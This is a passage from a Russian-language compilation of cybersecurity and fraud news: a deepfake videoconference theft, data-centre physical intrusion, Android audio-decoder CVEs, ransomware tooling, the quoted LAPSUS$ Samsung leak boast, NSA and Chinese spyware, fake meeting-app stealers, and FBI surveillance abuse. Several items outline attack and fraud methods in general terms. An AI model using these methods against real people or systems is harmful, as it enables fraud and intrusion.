Если пострадавших будет слишком много, то ВСС предлагает снижать размер выплат и установить очерёдность лиц. Таким образом, кому-то ущерб компенсируют, а кому-то — нет, резюмировал Новиков.
За октябрь 2024 года РКН зарегистрировал 13 утечек на 9,7 млн записей с данными российских пользователей. С начала года утекло более 600 млн записей после 110 киберинцидентов. За утечки персональных данных на компании налагают административные штрафы до 100 тыс. руб.
habr.com/ru/news/857576
Мошенники убедили сотрудника, что мир вокруг - иллюзия.
По данным СМИ SCMP, международная компания в Гонконге стала жертвой мошенничества с использованием технологии дипфейков, потеряв $25,6 млн. Сотрудников местного филиала обманули с помощью цифрового двойника главного финансового директора, который в ходе видеоконференции приказал провести денежные переводы.
Случай стал первым подобным в Гонконге и вызвал особый интерес из-за вовлеченной крупной суммы денег. Детали о компании и сотрудниках не разглашаются. Полиция акцентировала внимание на новизне метода мошенничества, когда все участники группового видеозвонка, кроме самой жертвы, являлись дипфейками.
В отличие от предыдущих случаев мошенничества, где жертв обманывали в ходе видеозвонков один-на-один, злоумышленники использовали технологию дипфейков для создания групповых видеоконференций, где внешность и голоса мошенников были неотличимы от реальных людей.
Такой подход позволил обмануть сотрудника финансового отдела. Он получил фишинговое сообщение якобы от главного финансового директора компании из Великобритании о необходимости секретной транзакции, и, несмотря на первоначальные сомнения, принял участие в групповой видеоконференции, где «присутствовали» директор, другие работники компании и сторонние лица. Сотрудник следовал инструкциям собеседников и осуществил 15 переводов на общую сумму 200 миллионов гонконгских долларов на 5 банковских счетов в Гонконге.
События разворачивались на протяжении недели с момента обращения к сотруднику до момента, когда человек осознал обман, обратившись в головной офис компании. Полиция в ходе расследования выяснила, что участники встречи были дипфейками, для которых использовались общедоступные видео и аудиозаписи.
Отмечается, что во время видеоконференции мошенники просили жертву представиться, но на самом деле не взаимодействовали с ней. Дипфейки на экране в основном давали указания на перевод средств.
Мошенники поддерживали связь с жертвами через мессенджеры, электронную почту и видеозвонки, применяя аналогичные методы для общения еще с несколькими сотрудниками компании. Полиция продолжает расследование, но пока арестов не было.
Полиция Гонконга призывает к бдительности, указывая на новые способы использования дипфейк-технологий мошенниками. Предложено несколько способов проверки подлинности собеседников в видеоконференциях, включая просьбу о движении головой и ответах на вопросы, особенно если в разговоре поднимается вопрос о денежных переводах.
Отдельно отмечается инициатива по расширению механизма оповещения о мошенничестве в системе быстрых платежей (Faster Payment System, FPS), который позволит предупреждать пользователей о переводах на счета, связанные с мошенничеством, через 35 банков и 9 сервисов хранения средств, а также через мобильные приложения, банкоматы и банковские стойки во второй половине года.
sc: scmp.com/news/hong-kong/law-and-crime/article/3250851/everyone-looked- real-multinational-firms-hong-kong-office-loses-hk200-million-after-scammers- stage?campaign=3250851&module=perpetual_scroll_0&pgtype=article
Суд приговорил экс-чиновника китайской провинции Цзянси И Сяо к пожизненному заключению за коррупционную деятельность и поддержку операций по добыче криптовалют.
Согласно материалам дела, в период с 2008 по 2021 год обвиняемый пользовался своим служебным положением в корыстных целях и заработал более 125 млн юаней (~$17,1 млн) на взятках.
С 2017 по 2021 год Сяо также занимал должность партийного секретаря города Фучжоу. На своем посту он помогал налаживать работу майнинговым компаниям, что «привело к значительным потерям для государственной собственности, национальных и народных интересов», добавил суд.
В дополнение к пожизненному сроку, Сяо навсегда лишили политических прав и конфисковали все личное имущество.
В конце мая 2021 года вице-премьер Госсовета КНР Лю Хэ заявил о намерении властей принять меры в отношении майнинга криптовалют и торговли биткоином.
В начале июня власти в провинциях Синьцзян и Цинхай приказали местным компаниям по добыче цифровых активов прекратить операции. К ограничению деятельности приступили и в регионе Юньнань.
source: court.gov.cn/fabu/xiangqing/409502.html
ИБ-специалисту Эндрю Тирни удалось получить несанкционированный доступ к ЦОД через «коридор для мочи». Тирни, который работает консультантом в службе ИБ- безопасности Pen Test Partners , рассказал, что можно получить физический доступ к предположительно безопасной зоне ЦОД через его туалеты.
Тирни показал, что в неназванном объекте есть отдельная ванная комната для общего офисного помещения и безопасная зона, где размещена IT-инфраструктура. Однако, 2 туалета были смежными и образовывали общее пространство для обслуживания туалетов за кабинками, которое он назвал «коридором для мочи».
[](https://www.securitylab.ru/upload/images/content- img(180).png)
«Одной из моих любимых способов физического доступа к ЦОД были туалеты. Мне нужно было перейти с менее защищенной стороны подвального этажа к более защищенной стороне» , - написал Тирни в Twitter .
В это помещение можно попасть через потайную дверь в туалете для инвалидов. Тирни вошел в туалеты со стороны общего офисного помещения и получил доступ к «коридору для мочи» через большую кабинку для инвалидов. Тирни не уточнил, пришлось ли взламывать замки на скрытых дверях, чтобы войти.
Исследователю удалось обойти систему безопасности ЦОД, при которой персонал должен «сдать все цифровые устройства» при входе. Кроме того, схема туалета показана на плане этажа. Это значит, что любой мог понять, как обойти систему безопасности.
source: twitter.com/cybergibbons/status/1544031303468728320
Критическая уязвимость RCE в декодере устройств Android, работающих на чипсетах Qualcomm и MediaTek, может открывать доступ к медиафайлам пользователей и делает 2/3 девайсов уязвимыми для взлома.
Исследователи Check Point Research обнаружили критическое удаленное выполнение кода, которое влияет на реализацию Apple Lossless Audio Codec (ALAC) в устройствах Android, работающих на чипсетах Qualcomm и MediaTek. Производители чипсетов использовали уязвимую версию кода ALAC в своих аудиодекодерах.
ALAC — это формат кодирования звука, разработанный Apple для сжатия данных цифровой музыки без потерь, был разработан в 2004 году. В 2011 году исходный код был раскрыт Apple, с тех пор его использовали многие сторонние поставщики.
MediaTek отметила ошибки в ALAC как CVE-2021-0674 (средняя серьезность с оценкой 5,5) и CVE-2021-0675 (высокая серьезность с оценкой 7,8), а Qualcomm - как CVE-2021-30351 (критическая степень тяжести с 9,8 балла).
Уязвимости подвержены более половины всех смартфонов по всему миру. Удаленный злоумышленник может активировать уязвимость, обманом заставив целевое устройство открыть искаженный аудиофайл для выполнения произвольного кода. Исследователи называют эту атаку ALHACK.
Воздействие уязвимости RCE может варьироваться от запуска вредоносного ПО до получения злоумышленником контроля над мультимедийными данными пользователя, включая потоковую передачу с камеры взломанной машины. Кроме того, непривилегированное Android-приложение может использовать эти уязвимости для повышения своих привилегий и получения доступа к медиаданным и разговорам пользователей.
Во взаимодействии с Check Point производители MediaTek и Qualcomm исправили ошибку в декабре 2021 года. Исследователи не раскрывают подробностей об уязвимости во избежании ее эксплуатации в дикой природе, свои выводы они готовы представить на CanSecWest в мае 2022 года.
• Source: [https://blog.checkpoint.com/2022/04...-users-privacy-around-the- world-were-at-risk/](https://blog.checkpoint.com/2022/04/21/largest-mobile- chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users- privacy-around-the-world-were-at-risk/)
Специалисты по кибербезопасности наткнулись на интересную кампанию операторов программы-вымогателя, в которой злоумышленники использовали кастомные инструменты, присущие обычно APT-группировкам (Advanced Persistent Threat).
Исследователи из [Security Joes опубликовали отчёт](https://secjoes- reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf), согласно которому от рук операторов шифровальщика пострадал один из клиентов компании, занимающийся азартными играми.
В ходе атаки киберпреступники задействовали кастомные инструменты с открытым исходным кодом. Например, эксперты выделяют модифицированную версию утилиты Ligolo, предназначенной для обратного туннелирования и доступной для пентестеров на GitHub. Также злоумышленники использовали специальную тулзу для дампа учётных данных из LSASS.
По словам команды Security Joes, описываемая кибератака демонстрирует отличную подготовку вымогателей и знания по части Red Teaming. Проникнуть в системы жертвы им помогли украденные учётные данные SSL-VPN одного из сотрудников. Далее в ход пошли брутфорс RDP и сканирования.
На заключительном этапе кампании злоумышленники развернули прокси- туннелирование для защищённого соединения и установили знаменитый Cobalt Strike. В Security Joes считают, что следующим шагом атакующие бы запустили шифровальщик, так как задействованные методы указывают именно на это. Тем не менее до этого не дошло, поэтому утверждать с точностью нельзя.
Модифицированную версию Ligolo, написанную на GoLang и получившую имя «Sockbot», киберпреступники лишили необходимости использовать параметры командной строки и оснастили проверкой запуска, чтобы избежать выполнения нескольких процессов.
Помимо этого, злоумышленники взяли в арсенал кастомный инструмент «lsassDumper», также написанный на GoLang. Он использовался для автоматической кражи данных из процесса LSASS. Как отметили специалисты, они впервые наблюдали lsassDumper в реальных атаках.
Группа LAPSUS$, проявившая себя взломом инфраструктуры компании NVIDIA, объявила в своём telegram-канале об аналогичном взломе Samsung. Сообщается об утечке около 190 ГБ данных, включающих исходные тексты различных продуктов Samsung, загрузчиков, механизмов аутентификации и идентификации, серверов активации, системы защиты мобильных устройств Knox, online-сервисов, API, а также проприетарных компонентов, поставляемых компанией Qualcomm.
В том числе заявлено о получении кода всех TA-апплетов (Trusted Applet), выполняемых в аппаратно изолированном анклаве, основанном на технологии TrustZone (TEE), кода управления ключами, модулей DRM и компонентов для обеспечения биометрической идентификации. Данные опубликованы в открытом доступе и уже доступны на torrent-трекерах. По поводу ранее выдвинутого компании NVIDIA ультиматума с требованием перевода драйверов на свободную лицензию, сообщается, что результат будет объявлен позднее.
SAMSUNG LEAK IS HERE!
Now leaking confidential Samsung source code! Our leak from breach includes:
DEVICES/HARDWARE
-Source code for every Trusted Applet (TA) installed on all samsung device's TrustZone (TEE) with specific code for every type of TEE OS (QSEE, TEEGris etc) THIS INCLUDES DRM MODULES AND KEYMASTER/GATEKEEPER!
-Algorithms for all biometric unlock operations, including source code that communicates directly with sensor (down to the lowest level, we're talking individual RX/TX bitstreams here)
-Bootloader source code for all recent Samsung devices, including Knox data and code for authentication.
-Various other data, confidential source code from Qualcomm.
ONLINE SERVICES
-Samsung activation servers source code (for first-time setup)
-SAMSUNG ACCOUNTS FULL SOURCE CODE! Including Authentication, Identity, API, Services, and many more that wouldn't fit here!
-Various other data.
As always, enjoy!
Click to expand...
• Source: https://t.me/minsaudebr/153 (189ГБ)
Полиция Северного округа сегодня (воскресенье) арестовала шестерых подозреваемых в мошенничестве с участием более 150 гражданских лиц на сумму от 2000 до 300 000 шекелей каждый.
Отдел по борьбе с мошенничеством полиции северного округа начал тайное расследование с участием следователей кредитной компании после многочисленных жалоб потерпевших на то, что их обманули.
Полицейское расследование показало, что подозреваемые выдавали себя за представителей предприятий и компаний, таких как Von-Market, Psagot, X-Finance и Meitav Dash, и предлагали жертвам переводить им средства для инвестиционной деятельности, страхования, покупок и других услуг.
Следствие также установило, что подозреваемые использовали данные некоторых потерпевших с целью обмана других потерпевших и сделали их подозреваемыми.
Согласно материалам следствия, подозреваемые обманным путем получили от потерпевших более 1 миллиона шекелей.
Среди потерпевших в основном числятся: пожилые люди, люди с ограниченными возможностями и лица, находящиеся в бедственном положении.
Подозреваемые были удивлены приходом полицейских в их квартиру, отказались открывать дверь, пытаясь избавиться от своих телефонов, но были застигнуты врасплох после того, как детективы ворвались внутрь.
Специалисты ИБ-компании Check Point представили подробное описание системы DoubleFeature, предназначенной для регистрации различных этапов постэксплуатации, связанной с развертыванием DanderSpritz. DanderSpritz – полнофункциональная вредоносная среда из арсенала APT-группы Equation Group, которую связывают с Агентством национальной безопасности США (АНБ).
Впервые о DanderSpritz стало известно 14 апреля 2017 года, когда хакерская группировка Shadow Brokers опубликовала похищенные у АНБ инструменты. Утечка также содержала разработанный АНБ эксплоит EternalBlue, сделавший возможной масштабную атаку вымогательского ПО NotPetya в июне 2017 года.
DanderSpritz представляет собой модульный, незаметный, полностью функциональный фреймворк, базирующийся на десятках плагинов для постэкплуатационной активности на Windows- и Linux-хостах. Одним из них является DoubleFeature – инструмент диагностики зараженных DanderSpritz машин.
Как пояснили исследователи, DoubleFeature играет роль своего рода «Розеттского камня» для лучшего понимания модулей DanderSpritz и скомпрометированных ими систем.
«Это просто голубая мечта команд реагирования на инциденты», – заявили исследователи.
Инструмент DoubleFeature, разработанный для журналирования инструментов, которые развернуты на атакуемой машине, представляет собой панель управления на языке программирования Python. Помимо прочего, панель также играет роль утилиты отчетности для извлечения информации из журналов и загрузки их на подконтрольный злоумышленникам сервер. Выходные данные интерпретируются с помощью специализированного исполняемого файла DoubleFeatureReader.exe.
Плагины, мониторинг которых осуществляет DoubleFeature, включают: инструменты для удаленного доступа UnitedRake (второе название EquationDrug) и PeddleCheap, бэкдор для незаметного извлечения данных StraitBizarre, шпионскую платформу KillSuit (второе название GrayFish), набор инструментов для сохранения постоянства на системе DiveBar, драйвер для скрытого доступа к сети FlewAvenue, а также имплант-валидатор MistyVeal, проверяющий скомпрометированную систему на аутентичность.
«Иногда мир инструментов высококлассных APT-групп и мир обычного вредоносного ПО кажется двумя параллельными вселенными. Финансируемые правительством группировки, как правило, оперируют огромными секретными кодовыми базами с огромным набором функций, использующимися более десятилетия из-за практической необходимости. Выходит, мы все еще медленно перевариваем утечку четырехлетней давности, раскрывшей нам DanderSpritz, и получаем новые идеи», – отметили исследователи.
• Source: [https://research.checkpoint.com/202...-equation-groups-post- exploitation-dashboard/](https://research.checkpoint.com/2021/a-deep-dive- into-doublefeature-equation-groups-post-exploitation-dashboard/)
Испанские спецслужбы ликвидировали на территории королевства международную преступную группировку. По версии следствия, злоумышленники совершили акты мошенничества в общей сложности на три миллиона евро.
Сотрудники Национальной полиции уничтожили всю инфраструктуру банды. Преступники делали звонки, имитирующие голоса работников испанских банков. В результате, аферисты обманули свыше десяти тысяч человек.
В ходе масштабной полицейской операции арестованы 83 человека, 35 из которых поймали в нескольких испанских городах (Мадрид, Виго, Барселона, Майорка и Саламанка), а еще 48 человек задержали в Перу.
Там преступники управляли мошеннической схемой из трёх call-центров, где 50 работников звонили жертвам от имени якобы банков и выманивали их персональные данные с целью последующего похищения денежных средств.
В день они совершали более тысячи таких звонков и уговаривали жертв сообщить им код из поступивших смс-сообщений. У каждого человека мошенники вымогали от 100 до 200 евро. В правоохранительных структурах добавили, что затем злоумышленники выводили и отмывали украденные деньги.
Операция включила в себя 29 одновременных обысков в двух странах. Полицейские конфисковали деньги, мобильные телефоны, компьютеры и документы.
Ранее стало известно, что на территории Испании стремительно растет количество фактов мошенничества с переводами через приложение Bizum. В Guardia Civil заявили, что схема «обратный Bizum» чаще всего наблюдается на платформах купли-продажи. Так, покупатель якобы заинтересован в товаре и настаивает на оплате через Bizum.
• Source: lavanguardia.com/sucesos/20241212/10194236/cae-red- estafo-3-millones-fraudes-telefonicos-83-detenidos-10-000-victimas-asd.html
Аналитики компании Lookout обнаружили неизвестную ранее спайварь для Android под названием [EagleMsgSpy](https://www.lookout.com/threat- intelligence/article/eaglemsgspy-chinese-android-surveillanceware). Предполагается, что она используется правоохранительными и государственными органами Китая для наблюдения за мобильными устройствами.
Исследователи считают, что шпионское ПО было разработано китайской компанией Wuhan Chinasoft Token Information Technology Co., Ltd. (она же Wuhan Zhongruan Tongzheng Information Technology Co., Ltd and Wuhan ZRTZ Information Technology Co, Ltd.) и используется как минимум с 2017 года.
При этом первые артефакты, связанные с EagleMsgSpy, были загружены на VirusTotal лишь 25 сентября 2024 года.
В своем отчете специалисты приводят множество доказательств, связывающих EagleMsgSpy с его разработчиками и операторами, включая IP-адреса, связанные с управляющими серверами, домены, прямые ссылки во внутренней документации, а также публичные контракты и собранные при помощи OSINT-данные.
Например, домен, который Wuhan Chinasoft Token Information Technology использует для размещения рекламных материалов (tzsafe[.]com), также фигурирует в коде EagleMsgSpy, а в документации малвари напрямую упоминается само название компании.
Кроме того, изученные скриншоты тестовых устройств из административной панели EagleMsgSpy соответствуют местоположению офиса компании в Ухане.
Отмечается, что во внутренней документации и инфраструктуре разработчиков спайвари были обнаружены и признаки существования iOS-варианта EagleMsgSpy, однако образца для устройств Apple в распоряжении исследователей пока нет.
Сами разработчики описывают EagleMsgSpy как «комплексный продукт для юридического мониторинга мобильных устройств», который способен собирать «информацию с мобильных телефонов подозреваемых в режиме реального времени, посредством контроля сети без ведома подозреваемого, отслеживать все действия преступника с мобильными телефонами и обобщать их».
Специалисты Lookout полагают, что правоохранительные органы вручную устанавливают EagleMsgSpy на целевые устройства, когда у них есть физический доступ к разблокированным девайсам. Вероятно, это происходит во время конфискации устройств, например, в ходе арестов.
[](https://xakep.ru/wp- content/uploads/2024/12/492940/installer.jpg)
Так как APK-установщик не удалось обнаружить в Google Play Store или сторонних магазинах приложений, предполагается, что шпионское ПО распространяется весьма небольшим кругом операторов.
Изучение разных образцов спайвари показало, что разработчики активно совершенствуют обфускацию кода и шифрование (например, при помощи опенсорсного ApkToolPlus), то есть EagleMsgSpy явно находится в активной разработке.
Будучи установлен на целевое устройство, EagleMsgSpy демонстрирует следующую активность:
Все собранные данные временно сохраняются в скрытом каталоге, шифруются, сжимаются, а затем передаются на управляющие серверы.
Панель администратора вредоносной программы носит название «Stability Maintenance Judgment System». Она позволяет удаленным операторам в режиме реального времени инициировать такие действия, как запись аудио, отображение географического распределения контактов жертвы и наблюдение за обменом сообщениями.
[](https://xakep.ru/wp- content/uploads/2024/12/492940/panel.jpg)[](https://xakep.ru/wp- content/uploads/2024/12/492940/contacts-geo.png)
Что касается операторов шпионского ПО, Lookout заявляет, что управляющие серверы EagleMsgSpy связаны с доменам Бюро общественной безопасности, например, с отделениями в Яньтае и Чжифу.
Также в отчете отмечается, что специалистам Lookout удалось идентифицировать два IP-адреса, связанных с SSL-сертификатами управляющих серверов EagleMsgSpy (202.107.80[.]34 и 119.36.193[.]210). Ранее эти адреса уже использовались другими шпионскими инструментами из Китая, включая PluginPhantom и CarbonSteal.
Исследователи в области кибербезопасности предупредили о новой мошеннической кампании, использующей фальшивые приложения для видеоконференций для распространения стилера под названием Realst. Мошенники нацелены на людей, работающих в Web3, маскируя свои действия под фальшивые деловые встречи.
«Злоумышленники, стоящие за этим вредоносным ПО, создали фальшивые компании с использованием искусственного интеллекта, чтобы повысить их легитимность», — сказала исследователь Cado Security Тара Голд. «Компания связывается с жертвами, предлагая им провести видеозвонок, после чего пользователь должен скачать приложение для встречи с сайта, который на самом деле является инфостилером Realst».
Эта активность была названа Meeten в честь используемых злоумышленниками имен
для фальшивых сайтов, таких как Clusee, Cuesee, Meeten, Meetone и Meetio.
Атаки заключаются в том, что злоумышленники обращаются к потенциальным жертвам
в Telegram, предлагая обсудить инвестиционную возможность, и призывают
присоединиться к видеозвонку через одну из сомнительных платформ. Попавшие на
сайт пользователи получают запрос на скачивание версии для Windows или macOS в
зависимости от используемой операционной системы.
После установки и запуска на macOS пользователи видят сообщение, в котором говорится: «Текущая версия приложения несовместима с вашей версией macOS», и предлагается ввести системный пароль, чтобы приложение заработало как положено.
Это достигается с помощью техники osascript, которая использовалась рядом семейств воришек для macOS, таких как Atomic macOS Stealer, Cuckoo, MacStealer, Banshee Stealer и Cthulhu Stealer. Конечной целью атаки является кража различных типов конфиденциальных данных, включая данные из криптовалютных кошельков, и передача их на удалённый сервер.
Вредоносное ПО также может украсть учётные данные Telegram, банковскую информацию, данные из iCloud Keychain и файлы cookie браузеров, таких как Google Chrome, Microsoft Edge, Opera, Brave, Arc, Cốc Cốc и Vivaldi.
Фальшивые приложения для видеоконференций
Версия приложения для Windows представляет собой файл Nullsoft Scriptable
Installer System (NSIS), подписанный вероятно украденной настоящей подписью от
Brys Software Ltd. В установщике встроено приложение на Electron, которое
настроено для загрузки исполнимого файла стилякера, основанного на Rust, с
домена, контролируемого злоумышленниками.
«Злоумышленники всё чаще используют ИИ для создания контента для своих кампаний», — сказала Голд. «Использование ИИ позволяет им быстро создавать реалистичный контент для сайтов, что добавляет легитимности их мошенничествам и затрудняет обнаружение подозрительных сайтов».
Это не первый случай, когда фальшивые бренды программного обеспечения для встреч используются для распространения вредоносных программ. В марте этого года лаборатории Jamf Threat Labs обнаружили поддельный сайт meethub[.]gg, распространяющий вирус, схожий с Realst.
В июне Recorded Future рассказали о кампании, получившей название markopolo, которая нацеливалась на пользователей криптовалют, предлагая фальшивое виртуальное программное обеспечение для встреч, чтобы опустошить их кошельки с помощью кражи данных, используя такие программы как Rhadamanthys, Stealc и Atomic.
Это развитие событий происходит на фоне того, как злоумышленники, стоящие за вредоносным ПО Banshee Stealer для macOS, прекратили свою деятельность после утечки исходного кода. Причины утечки пока не ясны. Вредоносное ПО рекламировалось на форумах киберпреступности по подписке за $3 000 в месяц.
Кроме того, появляются новые семьи программ-вредителей, такие как Fickle Stealer, Wish Stealer, Hexon Stealer и Celestial Stealer, в то время как пользователи и компании, ищущие пиратское ПО и инструменты ИИ, становятся мишенью для RedLine Stealer и Poseidon Stealer.
«Атаки в рамках этой кампании явно нацелены на организации русскоязычных предпринимателей, использующих программное обеспечение для автоматизации бизнес-процессов», — отметили специалисты Kaspersky по поводу кампании RedLine Stealer.
В Нидерландах осуждены трое мужчин за продажу криптокоммуникационного сервиса преступным организациям. Суд города Арнем вынес приговор по делу, связанному с предложением услуг шифрованной телефонной связи и приложений, которые использовались для преступных целей.
Трио управляло телекоммуникационной компанией, которая с 2015 по 2018 год продавала шифрованные телефоны и приложения, позволяющие общаться анонимно. Клиенты оплачивали услуги преимущественно наличными, а их персональные данные не собирались. Это обеспечивало высокий уровень анонимности, привлекавший криминальные структуры.
Следствие установило, что проданные телефоны и приложения активно использовались для координации преступных действий, в том числе связанных с наркотиками. Примечательно, что обвиняемые знали о том, что их продукция применяется для незаконной деятельности, и даже отключали аккаунты клиентов, когда те попадали в руки полиции, чтобы скрыть доказательства.
Кроме того, двое из осужденных были причастны к подделке документов, создавая фиктивные счета-фактуры, которые затем использовались в бухгалтерской отчётности компании.
Суд пришёл к выводу, что заработанные 1,2 миллиона евро имеют криминальное происхождение, и что обвиняемые осознавали это, участвуя в отмывании денег. Эти средства были получены от продажи услуг, способствующих преступной деятельности.
Лидер группировки, 52-летний мужчина из города из Хёйссен, не только организовал продажу криптопродукции, но и сотрудничал с другой преступной группой, предоставляя им доступ к шифрованным приложениям для совершения преступлений, связанных с наркотрафиком.
Несмотря на серьёзность преступления, суд учёл длительность расследования и признал, что это смягчает наказание для обвиняемых. Лидер преступной группы получил 4,5 года лишения свободы, а двое его соучастников — 22 и 18 месяцев соответственно.
rechtspraak.nl/Organisatie-en-contact/Organisatie/Rechtbanken/Rechtbank- Gelderland/Nieuws/Paginas/Trio-cel-in-voor-verkopen- cryptocommunicatiedienst-.aspx
С развитием цифровых технологий и повсеместной информатизации наблюдается рост преступлений совершаемых с использованием современных устройств, информационных систем и телекоммуникационных сетей.
С целью выявления и пресечения преступлений в сфере цифровых технологий, АФМ созданы специальные подразделения, результатом работы которых стало выявление 18 преступлений связанных с незаконным оборотом цифровых активов и майнинговой деятельностью с оборотом более 36 млрд тенге.
Кроме того, выявлены 3 факта хищения средств государства выделенных на обслуживание информационных систем, создание облачных бухгалтерии и цифровизацию жалоб на качество коммунальных услуг.
Так, приговором суда от 23.05.2024 г. осужден к 6 и 6 мес. один из руководителей Комитета МКС РК и директор подрядной организации за хищение 105 млн. тенге бюджетных средств, выделенных на техническое сопровождение в течении 6 месяцев Информационной системы «Единый электронный архив документов», которая фактически на тот момент не функционировала.
В сфере незаконного оборота цифровых активов в 2024 году состоялось 6 приговоров, по которым в рамках досудебного расследования арестовано имущества добытое преступным путем стоимостью 1,2 млрд тенге.
На срок от 2 до 3,5 лет к лишению свободы осуждены 4 лица и к ограничению свободы – 2 лиц.
Так, приговором суда от 22.04.2024 г. к 2 годам лишения свободы с конфискацией имущества, добытого преступным путем на 58 млн. тенге и суммы полученного преступного дохода в размере 5,8 млрд тенге осужден гражданин РФ, который с 2020 по 2022 года занимался незаконным обменом криптовалюты. Приговор вступил в законную силу.
АФМ сообщает, что в соответствии с Законом РК «О цифровых активах в Республике Казахстан» на территории Республики Казахстан деятельность по цифровому майнингу подлежит лицензированию, а выпуск и оборот необеспеченных цифровых активов, а также деятельность подобных бирж может осуществляться только на территории Международного финансового центра «Астана».
t.me/afm_rk/2516
В США задержали мошенника, подозреваемого в получении около 7 миллионов долларов путем обмана клиентов сервиса по бронированию жилья «Airbnb» в период с января 2018 года по ноябрь 2019 года.
Схема выглядела так: мужчина по имени Шрей Гоэл и его сообщники использовали разные личности, чтобы дважды забронировать недвижимость и отказать клиентам в возмещении средств при отмене брони. Схема охватила почти 100 объектов недвижимости в разных штатах США и позволила мошенникам провести более 10 тысяч бронирований на «Airbnb».
По данным следствия, преступники выставляли на «Airbnb» одно и то же жилье по несколько раз, а затем отдавали предпочтению клиенту, предложившему саму высокую сумму за аренду. Остальным претендентам под фальшивыми предлогами, например, ссылаясь на форс-мажорную ситуацию, они отказывали в заранее оплаченном жилье и предлагали поселиться за ту же сумму в менее качественном. Если клиент на это не соглашался, ему все равно отказывали в возмещении средств.
При этом Гоэл скрывал отрицательные отзывы, удаляя и повторно внося недвижимость на сайт, а также публиковал вводящие в заблуждение положительные отзывы. Кроме всего этого он ложно извещал платформу аренды «Airbnb», якобы гость проживал в объекте недвижимости, что лишало последнего права на полный возврат средств в соответствии с политикой «Airbnb».
Пользуясь своей властью, ФБР в целях шпионажа незаконно просматривала данные внешней разведки США.
Вчера Суд по надзору за внешней разведкой США обнародовал заключение от апреля 2022 года, в котором разоблачается неправомерное использование ФБР так называемой базы данных Раздела 702 (Section 702) - огромный массив записей сообщения и другой информации, используемый ФБР и АНБ.
Суд установил, что ФБР неправомерно запрашивало базу данных, созданную в соответствии с разделом 702 Закона о надзоре за внешней разведкой, более 287 000 раз в 2020 и 2021 годах. Целями обысков ФБР являлись демонстранты 6 января, арестованные во время протеста против убийства полицией чернокожего Джорджа Флойда и около 19 000 американских инвесторов неназванной кампании в Конгрессе США.
Раздел 702 дает правительству США право собирать сообщения целей за границей. Общение американцев может попасть в базу данных, когда они общаются с кем-то за пределами США.
ФБР может проводить поиск в базе данных только тогда, когда у агентов есть основания полагать, что такой поиск даст информацию, имеющую отношение к целям внешней разведки, или доказательства преступлений. Аудит АНБ в конце 2022 года выявил множество случаев неправомерного использования ФБР базы данных для поиска среди американских граждан, в том числе конгрессмена США Дарина Лахуда, члена республиканской партии США (партия Дональда Трампа).
После аудита и публикации решения суда ФБР заявило, что злоупотребление было результатом «недоразумения», и пообещало решить проблему. Несмотря на это, срок действия Раздела 702 истекает в конце 2023 года без продления со стороны Конгресса, что может остановить неправомерное использование ФБР базы данных.
280 000 незаконных случаев наблюдения за год, сенаторы требуют изменений в работе бюро.
Специальный суд США по контролю за разведкой на днях опубликовал документ, в котором обвиняет ФБР в злоупотреблении полномочиями при прослушке без ордера. По данным суда, с 2020 по начало 2021 года ФБР провела более 278 тысяч незаконных запросов к базам данных, содержащим перехваченные разговоры и сообщения американских граждан.
Для прослушки без ордера ФБР использовала закон о внешней разведке (FISA), который позволяет следить за иностранцами за пределами США в целях предотвращения преступлений и терроризма. Однако этот закон также даёт доступ и к коммуникациям американцев, чем бюро пользовалось беспрецедентное число раз.
Суд признал, что ФБР систематически и широко нарушала требования закона, не обосновывая необходимость прослушки американских граждан. Среди жертв незаконной прослушки было чуть больше сотни участников протестов по поводу убийства Джорджа Флойда, участники штурма Капитолия 6 января 2021 года, а также почти 20 тысяч доноров кампании Конгресса.
По словам суда, в большинстве случаев ФБР «с разумной вероятностью не могло получить информацию иностранной разведки или доказательств преступления». Например, в отношении доноров конгрессменской кампании только 8 из почти 20 тысяч человек имели достаточные связи с иностранными агентами.
ФБР заявила, что внесла ряд изменений в свою практику для предотвращения злоупотреблений полномочиями, включая лучшее обучение персонала и более строгие требования для некоторых «чувствительных» запросов, например, связанных с избранными должностными лицами или журналистами.
Однако оппоненты закона FISA считают, что правительство продолжит нарушать права американских граждан на конфиденциальность своих коммуникаций, если Конгресс не проведет реформу. Закон FISA истекает в конце этого года, если его не продлят.
«Эти злоупотребления происходят уже много лет и несмотря на недавние изменения в практике ФБР, эти систематические нарушения частной жизни американцев требуют действий со стороны Конгресса», — заявил сенатор Рон Уайден, представитель партии демократов.
source:
washingtonpost.com/documents/adb47f54-b772-4099-b0c9-adf24ef64faa.pdf?itid=lk_inline_manual_2
regmedia.co.uk/2023/05/22/2021_fisc_opinion.pdf
Центр кибербезопасности ведомства будет искать инициаторов атак на свои структуры
Минцифры запустило отраслевой центр кибербезопасности, в задачи которого входит защита государственных информационных систем от хакерских атак. Его отличительной особенностью стал широкий функционал — помимо собственно защиты, центр займется и атрибуцией — поиском инициаторов атак и установлением их причастности к тем или иным хакерским группировкам. Такие расследования несвойственны отраслевым центрам безопасности, отмечают эксперты. «Известия» разобрались, насколько весомым может быть вклад Минцифры в выявление хакеров.
Одной из главных целей отраслевого центра безопасности Минцифры станет координация противодействия компьютерным атакам, а также их атрибуция — то есть поиск тех, кто за подобными атаками стоит. Это следует из материалов презентации, распространенной ведомством на тематическом мероприятии «Инфофорум-2022». Расследоваться будут кибератаки на подведомственные Минцифры структуры, такие как «Главный центр спецсвязи», ФГУП «Космическая связь», а также государственные информационные системы — ГИС ЖКХ и не только.
Центр, запущенный Минцифры в начале февраля, — не первый в России. Ранее аналогичная структура — ФинЦЕРТ — была организована Банком России. На том же «Инфофоруме-2022» Минэнерго анонсировало создание Energy CERT. Над подобным проектом работают и в сфере здравоохранения. Однако только в случае с Минцифры публично была озвучена функция атрибуции.
Рассуждая об этом, бизнес-консультант по безопасности Cisco Systems Алексей Лукацкий отметил, что в большинстве случаев данная опция центрам не нужна, поскольку мало влияет на защиту организации, но при этом крайне сложна в исполнении.
— Поэтому большинство центров реагирования — ни государственных, ни корпоративных — не включают ее в свой перечень задач, — говорит он.
Под атрибуцией атак, как правило, подразумевается установление личности преступника или принадлежности его к той или иной стране по цифровым следам вроде лингвистических особенностей в кодах вредоносных программ. Зачастую столь подробные расследования организовывают против хорошо организованных хакерских группировок.
В то же время установление личности и поимка конкретного хакера могут и не быть конечной целью атрибуции, отметил руководитель центра исследования безопасности промышленных систем «Лаборатории Касперского» Евгений Гончаров. По его словам, атрибуция чаще является системой знаний об инструментах групп преступников. Она помогает оценивать и классифицировать угрозы с целью повышения эффективности противодействия им.
